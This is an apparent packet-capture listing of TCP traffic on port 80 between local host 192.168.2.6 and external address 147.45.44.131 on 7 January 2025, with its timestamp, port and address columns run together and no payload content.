                                                                          Jan 7, 2025 06:12:05.318352938 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318361998 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318383932 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318424940 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318435907 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318444967 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318454981 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318456888 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318466902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318489075 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318520069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318522930 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318531036 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318542004 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318564892 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318574905 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318581104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318591118 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318598986 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318603039 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318660021 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318664074 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318700075 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318711042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318721056 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.318777084 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.318777084 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405474901 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405510902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405530930 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405541897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405553102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405564070 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405580044 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405584097 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405592918 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405621052 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405628920 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405632019 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405646086 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405659914 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405673027 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405675888 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405684948 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405694962 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405710936 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405719995 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405730963 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405747890 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405750036 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405762911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405770063 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405793905 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405793905 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405810118 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405824900 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405834913 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405844927 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405854940 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405855894 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405867100 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405868053 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405879021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405889034 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405893087 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405905962 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405916929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.405919075 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.405960083 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409265041 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409277916 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409296989 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409308910 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409324884 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409336090 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409358978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409369946 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409379005 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409399986 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409404039 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409415007 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409423113 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409426928 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409439087 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409451008 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409472942 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409477949 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409502029 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409513950 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409524918 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409559965 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409568071 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409579992 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409593105 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409615993 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409620047 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409629107 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409646988 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409656048 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409660101 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409683943 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409701109 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409713030 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409723043 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409746885 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409769058 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409771919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409784079 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409795046 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409818888 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409842968 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409854889 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409864902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409881115 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409887075 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409893036 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409915924 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409918070 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409928083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409934044 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409959078 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409966946 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.409970999 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.409984112 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410008907 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410134077 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410156012 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410166979 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410178900 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410182953 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410198927 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410217047 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410228968 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410229921 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410239935 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410245895 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410253048 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410267115 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410281897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410291910 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410291910 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410305023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410315990 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410326958 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410337925 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410363913 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410415888 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410428047 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410438061 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410449028 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410459042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410461903 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410470009 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410470963 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410495996 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410727024 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410746098 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410757065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410768986 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410789013 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410792112 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410804987 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410815001 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410815954 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410826921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410835981 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410840034 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410857916 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410861969 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410870075 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410881042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410883904 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410900116 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410909891 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410913944 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410926104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410936117 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410937071 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410948992 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410959959 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410962105 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.410972118 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.410990953 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.411014080 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.411065102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.411076069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.411089897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.411103010 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.411113024 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.411122084 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.411125898 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.411148071 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.411160946 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.497761011 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497792006 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497807980 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497817993 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497828007 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497838020 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497848034 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497849941 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.497859001 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497869968 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497880936 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497889996 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.497890949 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497912884 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.497925997 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497951031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497961044 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497971058 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497980118 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.497982979 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.497994900 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498006105 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498007059 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.498017073 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498027086 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.498039961 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.498087883 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498097897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498106956 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498116970 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498126030 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.498127937 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498142004 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498152971 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.498163939 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498173952 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498179913 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.498184919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498194933 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.498197079 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.498218060 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501526117 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501538038 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501560926 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501578093 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501594067 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501597881 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501622915 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501632929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501638889 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501650095 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501676083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501686096 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501687050 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501696110 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501720905 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501720905 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501732111 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501739979 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501750946 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501768112 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501774073 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501777887 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501806021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501807928 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501816988 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501827002 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501847029 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501864910 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501876116 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501883030 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501888990 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501909018 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501909971 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501919031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501945972 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.501945972 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501974106 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501985073 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.501991034 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.502017975 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.502017975 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502031088 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502063036 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.502199888 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502228022 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502238989 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502249002 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502259016 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502264023 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.502269983 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502279043 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.502280951 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502293110 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502302885 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.502311945 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.502332926 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503191948 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503202915 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503212929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503240108 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503243923 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503253937 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503276110 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503277063 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503288031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503298044 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503304005 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503333092 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503371000 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503391981 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503407955 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503424883 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503434896 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503443003 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503447056 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503458023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503468990 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503484964 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503499985 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503504038 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503511906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503535986 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503546000 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503550053 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503557920 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503576040 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503580093 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503607988 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503618956 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503628969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503638983 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503655910 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503671885 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503683090 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503694057 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503720999 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.503849030 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503859997 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.503870010 CET8049712147.45.44.131192.168.2.6
